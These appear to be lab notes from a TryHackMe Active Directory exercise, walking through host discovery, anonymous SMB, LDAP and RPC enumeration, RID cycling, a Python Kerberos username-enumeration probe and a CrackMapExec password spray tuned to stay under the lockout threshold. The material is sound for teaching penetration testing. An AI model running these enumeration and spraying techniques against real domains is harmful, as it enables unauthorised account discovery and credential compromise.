Attacktive Directory Notes

Attacktive Directory

fping

Like ping, fping uses ICMP echo requests to determine whether a host is up. Unlike ping, it accepts any number of targets, including a whole subnet, and instead of probing one target until it replies or times out it round-robins: it sends a request to each target in turn and comes back to the unanswered ones for retries. Keep in mind that hosts whose firewall drops ICMP will simply be missing from the list, so cross-check with a TCP probe such as nmap -sn -PS445 10.211.11.0/24 before treating a host as down.

We can run the following command to discover live hosts in our target network:

Terminal

user@tryhackme$ fping -agq 10.211.11.0/24
10.211.11.1
10.211.11.10
10.211.11.20
10.211.11.250
  • -a: shows systems that are alive.
  • -g: generates a target list from a supplied IP netmask.
  • -q: quiet mode, doesn't show per-probe results or ICMP error messages.

 

 

Nmap

We can also use Nmap in ping scan mode (-sn) to probe the entire subnet:

nmap -sn 10.211.11.0/24

  • -sn: Ping scan to determine which hosts are up without port scanning.

 

 

These are some common Active Directory ports and protocols:

Port  Protocol             What it means
88    Kerberos             Potential for Kerberos-based enumeration
135   MS-RPC               Potential for RPC enumeration (null sessions)
139   SMB/NetBIOS          Legacy SMB access
389   LDAP                 LDAP queries to AD
445   SMB                  Modern SMB access, critical for enumeration
464   Kerberos (kpasswd)   Password-related Kerberos service

We can run a service version scan against these ports to help identify the DC; a host that listens on both 88 and 389 is almost certainly a domain controller, and the default smb-os-discovery script prints its hostname and domain:

nmap -p 88,135,139,389,445 -sV -sC -iL hosts.txt

  • -sV: This enables version detection. Nmap will try to determine the version of the services running on the open ports.
  • -sC: Runs Nmap Scripting Engine (NSE) scripts in the default category.
  • -iL: This tells Nmap to read the list of target hosts from the file hosts.txt. Each line in this file should contain a single IP address or hostname.

 

We could use this command to scan for all open ports:

nmap -sS -p- -T3 -iL hosts.txt -oN full_port_scan.txt

  • -sS: TCP SYN (half-open) scan; it never completes the handshake, so it is quieter than a full connect scan, and it needs root privileges.
  • -p-: Scans all 65,535 TCP ports.
  • -T3: The "normal" timing template, which is also Nmap's default; it balances speed against the risk of dropped probes.
  • -iL hosts.txt: Reads the live hosts saved from the host discovery step (for example, the output of fping -agq redirected into hosts.txt).
  • -oN full_port_scan.txt: Writes the results to a file in Nmap's normal, human-readable format.

 

We will focus on enumerating network shares over the Server Message Block (SMB) protocol. First we use Nmap to discover the relevant listening ports and identify services; then we attempt to access the shares from the AttackBox with smbclient and smbmap; finally we grab the contents of any share that allows anonymous access.

 

  • TCP 88 (Kerberos): The KDC listens here, so every domain authentication touches this port. From a penetration testing point of view it supports username enumeration (see Kerbrute below) and ticket attacks such as Kerberoasting and Pass-the-Ticket.
  • TCP 135 (RPC Endpoint Mapper): Used for Remote Procedure Calls (RPC). Querying the endpoint mapper reveals which RPC interfaces are registered, which helps identify services for lateral movement or remote code execution via DCOM.
  • TCP 139 (NetBIOS Session Service): SMB over NetBIOS, used for file sharing on older Windows systems. It can be abused for null sessions and information gathering.
  • TCP 389 (LDAP): The Lightweight Directory Access Protocol. Traffic on this port is plaintext unless StartTLS is negotiated, and if anonymous binds are allowed it is a prime target for enumerating AD objects, users, and policies.
  • TCP 445 (SMB): SMB directly over TCP, critical for file sharing and remote administration; abused by exploits such as EternalBlue, by SMB relay attacks, and for credential theft.
  • TCP 636 (LDAPS): LDAP over TLS. The transport is encrypted, but the same directory data is exposed if the bind policy is weak, and the certificate the DC presents reveals its hostname and the issuing CA, a first hint that AD CS is present and worth investigating.

 

We scan the ports from the list above, detect their versions with -sV, and let the default scripts run with -sC. Our final command will be: nmap -p 88,135,139,389,445,636 -sV -sC TARGET_IP

 

Listing SMB Shares

smbclient is a command-line tool that allows interaction with SMB shares and is part of the Samba suite. It is similar to an FTP client. You can use it to list, upload, download, and browse files on a remote SMB server. In the terminal below, we try to list the shares via the -L option, with no password, hence the -N option. We can see some interesting shares below running smbclient -L //TARGET_IP -N.

AttackBox Terminal

root@tryhackme:~# smbclient -L //10.211.11.10 -N
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        AnonShare       Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SharedFiles     Disk      
        SYSVOL          Disk      Logon server share 
        UserBackups     Disk      
SMB1 disabled -- no workgroup available

Another tool is smbmap, a reconnaissance tool that enumerates the SMB shares on a host and shows the READ/WRITE permissions the current session has on each one. It is useful for quickly spotting accessible or misconfigured shares without connecting to each one manually. Below is an example of running smbmap -H TARGET_IP with no credentials, so it uses a null session. Note that smbmap is located in /root/Desktop/Tools/Miscellaneous/smbmap on the AttackBox.

AttackBox Terminal

root@tryhackme:~/Desktop/Tools/Miscellaneous/smbmap# ./smbmap.py -H 10.211.11.10
[+] Finding open SMB ports....
[+] User SMB session established on 10.211.11.10...
[+] IP: 10.211.11.10:445        Name: 10.211.11.10        
        Disk                     Permissions     Comment
        ----                     -----------     -------
        ADMIN$                   NO ACCESS       Remote Admin
        AnonShare                READ, WRITE
        C$                       NO ACCESS       Default share
        IPC$                     NO ACCESS       Remote IPC
        NETLOGON                 NO ACCESS       Logon server share 
        SharedFiles              READ, WRITE
        SYSVOL                   NO ACCESS       Logon server share 
        UserBackups              READ, WRITE

Running either of the above commands, we notice three non-standard shares that catch our attention: AnonShare, SharedFiles and UserBackups, and smbmap shows that our unauthenticated session has READ, WRITE on all three. ADMIN$, C$ and IPC$ are the default administrative shares, while NETLOGON and SYSVOL only exist on domain controllers, which confirms that 10.211.11.10 is a DC.

It is worth noting that you can also discover which shares grant access using Nmap's smb-enum-shares script, which reports READ/WRITE, READ, or no access for each share. The syntax is nmap -p445 --script smb-enum-shares 10.211.11.10. Without credentials the script relies on the same null session as smbmap; you can supply an account with --script-args smbusername=USER,smbpassword=PASS.

 

Accessing SMB Shares

 

We will target all the shares that showed READ access when we ran smbmap. To connect to a share with smbclient, use smbclient //TARGET_IP/SHARE_NAME -N. After connecting, we list the files with ls as shown below, and download a file with get file_name; in the terminal below we did a get Mouse_and_Malware.txt to pull the file to the AttackBox. To grab everything in a share at once, run recurse ON, then prompt OFF, then mget * inside the smbclient session.

AttackBox Terminal

root@tryhackme:~# smbclient //10.211.11.10/SharedFiles -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu May 15 16:03:40 2025
  ..                                  D        0  Thu May 15 16:03:40 2025
  Mouse_and_Malware.txt               A     1141  Thu May 15 10:40:19 2025

                7863807 blocks of size 4096. 3459432 blocks available
smb: \> get Mouse_and_Malware.txt
getting file \Mouse_and_Malware.txt of size 1141 as Mouse_and_Malware.txt (69.6 KiloBytes/sec) (average 69.6 KiloBytes/sec)
smb: \> exit

Since we don’t have login credentials, we are trying to access the various shares without a password, i.e., with the -N option. However, if you have a username and password to access the SMB share, you can easily specify them with --user=USERNAME --password=PASSWORD or -U 'username%password'. Note that for domain accounts, you need to specify the domain using -W.

 

enum4linux and its rewrite enum4linux-ng are tools that perform extensive enumeration over SMB and RPC in one go. You can try enum4linux -a TARGET_IP to get a trove of information; the enum4linux-ng equivalent is covered further down.

 

 

LDAP Enumeration (Anonymous Bind)

Lightweight Directory Access Protocol (LDAP) is a widely used protocol for accessing and managing directory services, such as Microsoft Active Directory. LDAP helps locate and organise resources within a network, including users, groups, devices, and organisational information, by providing a central directory that applications and users can query.
Some LDAP servers allow anonymous users to perform read-only queries. This can expose user accounts and other directory information.

We can test if anonymous LDAP bind is enabled with ldapsearch:

ldapsearch -x -H ldap://10.211.11.10 -s base

  • -x: Simple authentication; since we pass no bind DN (-D) and no password (-w), this is an anonymous bind.
  • -H: Specifies the LDAP server URI.
  • -s base: Limits the query to the base object itself and does not search its subtree or children. With no -b given, the base object is the rootDSE.

If the server answers, we get the rootDSE, which on AD is readable anonymously even when the rest of the directory is not. It includes attributes such as defaultNamingContext (the base DN of the domain), dnsHostName and supportedSASLMechanisms:

Terminal

user@tryhackme$ ldapsearch -x -H ldap://10.211.11.10 -s base

The real test of anonymous read access is whether a search under the naming context returns objects. Using the base DN from defaultNamingContext, we can list user objects:

ldapsearch -x -H ldap://10.211.11.10 -b "dc=tryhackme,dc=loc" "(objectClass=person)"

 

Enum4linux-ng

enum4linux-ng is a tool that automates various enumeration techniques against Windows systems, including user enumeration. It utilizes SMB and RPC protocols to gather information such as user lists, group memberships, and share details.

We can run the following command to get as much information as possible from the DC:

enum4linux-ng -A 10.211.11.10 -oA results.txt

  • -A: Performs all available enumeration functions (users, groups, shares, password policy, RID cycling, OS information and NetBIOS information).
  • -oA: Writes output to YAML and JSON files, appending the extensions to the given name (here results.txt.yaml and results.txt.json).

 

 

 

RPC Enumeration (Null Sessions)

Microsoft Remote Procedure Call (MSRPC) is a protocol that enables a program running on one computer to request services from a program on another computer, without needing to understand the underlying details of the network. RPC services can be accessed over the SMB protocol. When SMB is configured to allow null sessions that do not require authentication, an unauthenticated user can connect to the IPC$ share and enumerate users, groups, shares, and other sensitive information from the system or domain.

We can run the following command to verify null session access with:

rpcclient -U "" 10.211.11.10 -N

  • -U: Specifies the username; an empty string requests an anonymous (null) session.
  • -N: Tells rpcclient not to prompt for a password.

If successful, we can enumerate users with: enumdomusers

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[sshd] rid:[0x649]
user:[gerald.burgess] rid:[0x650]
user:[nigel.parsons] rid:[0x651]
user:[guy.smith] rid:[0x652]
user:[jeremy.booth] rid:[0x653]

 

RID Cycling

In Active Directory, RID (Relative Identifier) ranges are used to assign unique identifiers to user and group objects. The RID is the last component of the Security Identifier (SID), which uniquely identifies each object within a domain; the rest of the SID is the domain SID, shared by every object in that domain. Certain RIDs are well-known and standardised.

500 is the Administrator account, 501 is the Guest account, 502 is krbtgt, and 512-514 are the groups Domain Admins, Domain Users and Domain Guests. Objects created after the domain was built (users, computers, custom groups) are numbered from RID 1000 onwards. Note that rpcclient prints RIDs in hexadecimal: in the enumdomusers output above, 0x1f4 is 500 and 0x649 is 1609, so the custom accounts on this DC sit in the 1609-1619 range.

We can use enum4linux-ng to determine the RID range, or we can start with a known range, for example, 1000-1200, and increment if we get results.

If enumdomusers is restricted, we can still resolve RIDs one by one with queryuser, or hand a batch of SIDs (the domain SID from lsaquery with each candidate RID appended) to lookupsids, which is how enum4linux-ng's RID cycling works. The bash loop below takes the simple route and opens a new connection per RID:

Terminal

user@tryhackme$ for i in $(seq 500 2000); do echo "queryuser $i" | rpcclient -U "" -N 10.211.11.10 2>/dev/null | grep -i "User Name"; done
	User Name   :	sshd
	User Name   :	gerald.burgess
	User Name   :	nigel.parsons
	User Name   :	guy.smith
	User Name   :	jeremy.booth
	User Name   :	barbara.jones

  • for i in $(seq 500 2000): Iterates through a range of possible RIDs to identify valid user accounts; each iteration opens a fresh SMB connection, so 1,500 RIDs take a while.
  • echo "queryuser $i": Queries information about the user associated with RID $i.
  • 2>/dev/null: Redirects error messages (standard error) to /dev/null, silencing the noise from RIDs that do not exist.
  • | grep -i "User Name": Filters the output to the lines containing "User Name", ignoring case (-i).
  • Notice that barbara.jones shows up here but not in the enumdomusers listing above, so the two methods should always be cross-checked.
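As an added example, not part of the original notes and not taken from rpcclient or enum4linux-ng, the Python below shows the data RID cycling works on: the conversion between the text and binary (objectSid) forms of a SID, the well-known RID labels, and how a RID range becomes the batch of SIDs that rpcclient's lookupsids command resolves in a single session. The domain SID in it is constructed for illustration; on a real target take it from lsaquery in rpcclient.

```python
"""SID/RID helpers for RID cycling (added example; the domain SID is constructed)."""
import struct

# Well-known domain RIDs relevant to the enumeration above (MS-DTYP / MS-SAMR).
WELL_KNOWN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 514: "Domain Guests",
    515: "Domain Computers", 516: "Domain Controllers",
}


def parse_sid(sid: str) -> tuple[int, int, list[int]]:
    """Split 'S-1-5-21-...-RID' into (revision, identifier authority, sub-authorities)."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError(f"not a SID: {sid}")
    return int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]


def sid_to_bytes(sid: str) -> bytes:
    """Encode a SID in the binary layout AD stores in objectSid:
    revision (1 byte), sub-authority count (1 byte), identifier authority
    (6 bytes, big-endian), then each sub-authority as a 32-bit little-endian int."""
    revision, authority, subs = parse_sid(sid)
    out = struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
    return out + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(raw: bytes) -> str:
    """Decode the binary objectSid form back to 'S-1-5-...'."""
    revision, count = struct.unpack_from("<BB", raw, 0)
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack_from("<" + "I" * count, raw, 8)
    return "S-" + "-".join(str(x) for x in (revision, authority, *subs))


def rid_of(sid: str) -> int:
    """The RID is the last sub-authority of an account SID."""
    return parse_sid(sid)[2][-1]


def domain_sid_of(sid: str) -> str:
    """Everything before the RID: the domain SID shared by all objects in the domain."""
    return sid.rsplit("-", 1)[0]


def classify_rid(rid: int) -> str:
    """Label a RID the way you would when reading enumdomusers output."""
    if rid in WELL_KNOWN_RIDS:
        return f"well-known: {WELL_KNOWN_RIDS[rid]}"
    if rid < 1000:
        return "reserved/built-in range"
    return "regular domain object (RID >= 1000)"


def rid_cycle_targets(domain_sid: str, start: int, end: int) -> list[str]:
    """SIDs to resolve when cycling: the domain SID with each candidate RID appended."""
    return [f"{domain_sid}-{rid}" for rid in range(start, end + 1)]


def lookupsids_batches(domain_sid: str, start: int, end: int, per_call: int = 20) -> list[str]:
    """rpcclient command lines. lookupsids accepts several SIDs per call, so a whole
    RID range becomes a few commands fed to one rpcclient session instead of one
    SMB connection per RID as in the bash loop above."""
    sids = rid_cycle_targets(domain_sid, start, end)
    return ["lookupsids " + " ".join(sids[i:i + per_call]) for i in range(0, len(sids), per_call)]


if __name__ == "__main__":
    # Constructed domain SID for illustration (on a real target: 'lsaquery' in rpcclient).
    domain = "S-1-5-21-1004336348-1177238915-682003330"
    for hex_rid in ("0x1f4", "0x1f5", "0x1f6", "0x649", "0x650"):  # as rpcclient prints them
        rid = int(hex_rid, 16)
        print(f"{hex_rid} = {rid:4d}: {classify_rid(rid)}")
    account = f"{domain}-1609"
    print(sid_to_bytes(account).hex(), "->", bytes_to_sid(sid_to_bytes(account)))
    for line in lookupsids_batches(domain, 1600, 1620, per_call=10):
        print(line)
```

Pipe the printed lookupsids lines into rpcclient -U "" -N TARGET_IP to resolve the whole range over one null session; RIDs that do not exist come back as *unknown*, while users, groups and computers are returned with their name and type.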
        

Username Enumeration With Kerbrute

Tools like enum4linux-ng or rpcclient may return some usernames, but they could be:

  • Disabled accounts
  • Non-domain accounts
  • Fake honeypot users
  • Or even false positives

Running those through kerbrute lets us confirm which ones are real, active AD users, which allows us to target them more accurately with password sprays.

We can create a user list thanks to the usernames we gathered with the previous tools.

Example Terminal

user@tryhackme$ cat users.txt
Administrator
Guest
krbtgt
sshd

 

Kerbrute Installation

1.) Download a precompiled binary for your OS - https://github.com/ropnop/kerbrute/releases.

2.) Rename kerbrute_linux_amd64 to kerbrute.

3.) Run chmod +x kerbrute to make kerbrute executable.

Please note that kerbrute is not installed on the AttackBox, and will require internet access if you wish to download and experiment with it.

Kerbrute enumerates usernames by sending a Kerberos AS-REQ without pre-authentication for each candidate: the KDC answers differently for a principal that exists (pre-authentication required) and for one that does not (client principal unknown). No password is sent, so these attempts do not count towards the account lockout threshold, although every request is still handled by the DC. Run it against the DC with the domain name:

Example Terminal
user@tryhackme$ ./kerbrute userenum --dc 10.211.11.10 -d tryhackme.loc users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 05/16/25 - Ronnie Flathers @ropnop

2025/05/16 11:58:16 >  Using KDC(s):
2025/05/16 11:58:16 >  	10.211.11.10:88

2025/05/16 11:58:16 >  [+] VALID USERNAME:	 WRK$@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 guy.smith@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 sshd@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 nigel.parsons@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 gerald.burgess@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 barbara.jones@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 Administrator@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 jeremy.booth@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 kathryn.williams@tryhackme.loc
2025/05/16 11:58:16 >  [+] VALID USERNAME:	 danny.baker@tryhackme.loc
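The probe Kerbrute sends, as an added example in Python that is not kerbrute's own code: it builds an AS-REQ without pre-authentication using a minimal DER encoder (the RFC 4120 structures) and classifies the KDC's reply by its error code, which is what separates valid users (KDC_ERR_PREAUTH_REQUIRED, 25) from unknown ones (KDC_ERR_C_PRINCIPAL_UNKNOWN, 6) and disabled or locked-out ones (KDC_ERR_CLIENT_REVOKED, 18). The send_probe function needs a reachable KDC on TCP 88 and is not exercised offline; the KDC address and realm passed to it are assumptions, and the KRB-ERROR built in the main block is constructed.

```python
"""Kerberos username-enumeration probe (added example; not kerbrute's code)."""
import os, socket, struct
from typing import Optional

# ---- minimal DER encoder for the RFC 4120 structures used here --------------
def der_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def der(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + der_len(len(content)) + content

def der_int(v: int) -> bytes:          # minimal two's-complement INTEGER
    return der(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))

def der_seq(*items: bytes) -> bytes:   # SEQUENCE
    return der(0x30, b"".join(items))

def der_ctx(n: int, content: bytes) -> bytes:   # [n] context-specific, constructed
    return der(0xA0 | n, content)

def der_app(n: int, content: bytes) -> bytes:   # [APPLICATION n], constructed
    return der(0x60 | n, content)

def der_gstring(s: str) -> bytes:      # GeneralString (KerberosString)
    return der(0x1B, s.encode("ascii"))

# ---- AS-REQ (RFC 4120 section 5.4.1) ----------------------------------------
NT_PRINCIPAL, NT_SRV_INST = 1, 2
KDC_OPT_FORWARDABLE, KDC_OPT_RENEWABLE = 0x40000000, 0x00800000
ETYPES = (18, 17, 23)   # aes256-cts-hmac-sha1-96, aes128-cts-hmac-sha1-96, rc4-hmac

def principal_name(name_type: int, *names: str) -> bytes:
    return der_seq(der_ctx(0, der_int(name_type)),
                   der_ctx(1, der_seq(*[der_gstring(n) for n in names])))

def build_as_req(username: str, realm: str, nonce: Optional[int] = None) -> bytes:
    """AS-REQ with no padata, i.e. no pre-authentication: the probe kerbrute sends."""
    realm = realm.upper()                       # Kerberos realms are upper-case
    if nonce is None:
        nonce = int.from_bytes(os.urandom(4), "big") & 0x7FFFFFFF
    body = der_seq(
        der_ctx(0, der(0x03, b"\x00" + struct.pack(">I", KDC_OPT_FORWARDABLE | KDC_OPT_RENEWABLE))),
        der_ctx(1, principal_name(NT_PRINCIPAL, username)),
        der_ctx(2, der_gstring(realm)),
        der_ctx(3, principal_name(NT_SRV_INST, "krbtgt", realm)),
        der_ctx(5, der(0x18, b"20370913024805Z")),   # till (GeneralizedTime)
        der_ctx(7, der_int(nonce)),
        der_ctx(8, der_seq(*[der_int(e) for e in ETYPES])))
    return der_app(10, der_seq(der_ctx(1, der_int(5)), der_ctx(2, der_int(10)), der_ctx(4, body)))

# ---- classifying the KDC's answer -------------------------------------------
KRB_AS_REP, KRB_ERROR = 11, 30
KDC_ERR_C_PRINCIPAL_UNKNOWN, KDC_ERR_CLIENT_REVOKED, KDC_ERR_PREAUTH_REQUIRED = 6, 18, 25

def read_tlv(buf: bytes, pos: int = 0) -> tuple:
    """(tag, content, next_pos) for the TLV at pos; single-byte tags only."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def krb_error_code(reply: bytes) -> Optional[int]:
    """error-code [6] from a KRB-ERROR, or None if the reply is not a KRB-ERROR."""
    tag, content, _ = read_tlv(reply)
    if tag != 0x60 | KRB_ERROR:
        return None
    fields, pos = read_tlv(content)[1], 0      # the inner SEQUENCE
    while pos < len(fields):
        ftag, fcontent, pos = read_tlv(fields, pos)
        if ftag == 0xA0 | 6:
            return int.from_bytes(read_tlv(fcontent)[1], "big", signed=True)
    return None

def classify_reply(reply: bytes) -> str:
    if reply and reply[0] == 0x60 | KRB_AS_REP:      # a TGT without pre-auth
        return "valid (pre-authentication not required)"
    code = krb_error_code(reply)
    return {KDC_ERR_PREAUTH_REQUIRED: "valid", KDC_ERR_C_PRINCIPAL_UNKNOWN: "invalid",
            KDC_ERR_CLIENT_REVOKED: "valid but disabled or locked out",
            }.get(code, f"unexpected reply (error-code {code})")

def send_probe(kdc: str, username: str, realm: str, timeout: float = 3.0) -> str:
    """One AS-REQ over TCP/88 (4-byte length prefix, RFC 4120 section 7.2.2); needs a real KDC."""
    req = build_as_req(username, realm)
    with socket.create_connection((kdc, 88), timeout=timeout) as s:
        s.sendall(struct.pack(">I", len(req)) + req)
        length = struct.unpack(">I", s.recv(4))[0] & 0x7FFFFFFF
        reply = s.recv(length, socket.MSG_WAITALL)
    return classify_reply(reply)

if __name__ == "__main__":
    fake = der_app(KRB_ERROR, der_seq(der_ctx(6, der_int(KDC_ERR_PREAUTH_REQUIRED))))  # constructed
    print(len(build_as_req("guy.smith", "tryhackme.loc")), "byte AS-REQ;", classify_reply(fake))
```

Against the lab this would be send_probe("10.211.11.10", "guy.smith", "tryhackme.loc"); looping it over users.txt reproduces the VALID USERNAME lines above, and an AS-REP instead of a KRB-ERROR flags an account with pre-authentication disabled.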

 

rpcclient

We can use rpcclient via a null session to query the DC for the password policy:

rpcclient -U "" 10.211.11.10 -N

And then we can run the getdompwinfo command:

Example Terminal

rpcclient $> getdompwinfo
min_password_length: 12
password_properties: 0x00000001
	DOMAIN_PASSWORD_COMPLEX

 

CrackMapExec

CrackMapExec can pull the same policy over SMB, and it also prints the lockout settings we need before spraying (threshold, lockout duration and the reset window of the failure counter):

user@tryhackme$ crackmapexec smb 10.211.11.10 --pass-pol
SMB         10.211.11.10    445    DC               [*] Windows Server 2019 Datacenter 17763 x64 (name:DC) (domain:tryhackme.loc) (signing:True) (SMBv1:True)
SMB         10.211.11.10    445    DC               [+] Dumping password info for domain: TRYHACKME
SMB         10.211.11.10    445    DC               Minimum password length: 18
SMB         10.211.11.10    445    DC               Password history length: 21
SMB         10.211.11.10    445    DC               Maximum password age: 41 days 23 hours 53 minutes
SMB         10.211.11.10    445    DC               
SMB         10.211.11.10    445    DC               Password Complexity Flags: 000001
SMB         10.211.11.10    445    DC                   Domain Refuse Password Change: 0
SMB         10.211.11.10    445    DC                   Domain Password Store Cleartext: 0
SMB         10.211.11.10    445    DC                   Domain Password Lockout Admins: 0
SMB         10.211.11.10    445    DC                   Domain Password No Clear Change: 0
SMB         10.211.11.10    445    DC                   Domain Password No Anon Change: 0
SMB         10.211.11.10    445    DC                   Domain Password Complex: 1
SMB         10.211.11.10    445    DC               
SMB         10.211.11.10    445    DC               Minimum password age: 1 day 4 minutes
SMB         10.211.11.10    445    DC               Reset Account Lockout Counter: 30 minutes
SMB         10.211.11.10    445    DC               Locked Account Duration: 30 minutes
SMB         10.211.11.10    445    DC               Account Lockout Threshold: 10
SMB         10.211.11.10    445    DC               Forced Log off Time: Not Set
        

Performing Password Spraying Attacks

We have gathered a solid user list from our user enumeration in the previous task; we now need a small list of common passwords, and the password policy tells us which candidates are even possible. The policy enumeration showed that the complexity flag (DOMAIN_PASSWORD_COMPLEX, bit 0x1 of the properties bitmask) is set:

  • In rpcclient: password_properties: 0x00000001
  • With CrackMapExec: Password Complexity Flags: 000001

With this flag set, Windows accepts a password only if it contains characters from at least three of the following categories:

  1. Uppercase letters
  2. Lowercase letters
  3. Digits
  4. Special (non-alphanumeric) characters
  5. Any other Unicode alphabetic character that is neither uppercase nor lowercase

and it must not contain the user's account name. Combined with the minimum length, this lets us drop candidates such as password or 12345678 before we spray. Note that the two captures above report different minimum lengths (12 and 18); always use the policy read from the target you are about to spray. Just as important are the lockout settings: with a threshold of 10 failed attempts and a 30-minute reset window, the number of passwords tried per account within any 30-minute period has to stay well below 10.

 

We can use CrackMapExec to run our password spraying attack against the WRK computer. Since WRK is domain-joined, the logon attempts are validated by the DC, so failures still count towards the domain-wide lockout counter. By default CrackMapExec tries every password against every user and stops at the first valid pair; add --continue-on-success to keep going, and keep the password list short enough to stay under the lockout threshold.

user@tryhackme$ crackmapexec smb 10.211.11.20 -u users.txt -p passwords.txt
[*] First time use detected
[*] Creating home directory structure
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
[*] Copying default configuration file
SMB         10.211.11.20    445    WRK              [*] Windows 10.0 Build 17763 x64 (name:WRK) (domain:tryhackme.loc) (signing:False) (SMBv1:False)
SMB         10.211.11.20    445    WRK              [-] tryhackme.loc\Administrator:Password! STATUS_LOGON_FAILURE
SMB         10.211.11.20    445    WRK              [-] tryhackme.loc\Guest:Password! STATUS_LOGON_FAILURE
SMB         10.211.11.20    445    WRK              [-] tryhackme.loc\krbtgt:Password! STATUS_LOGON_FAILURE
SMB         10.211.11.20    445    WRK              [-] tryhackme.loc\DC$:Password! STATUS_LOGON_FAILURE
SMB         10.211.11.20    445    WRK              [-] tryhackme.loc\WRK$:Password! STATUS_LOGON_FAILURE
SMB         10.211.11.20    445    WRK              [-]
SMB         10.211.11.20    445    WRK              [-] tryhackme.loc\asrepuser1:Password1! STATUS_LOGON_FAILURE
SMB         10.211.11.20    445    WRK              [+] tryhackme.loc\*****:******

 

 


 

 

 

 

 

 

 

 
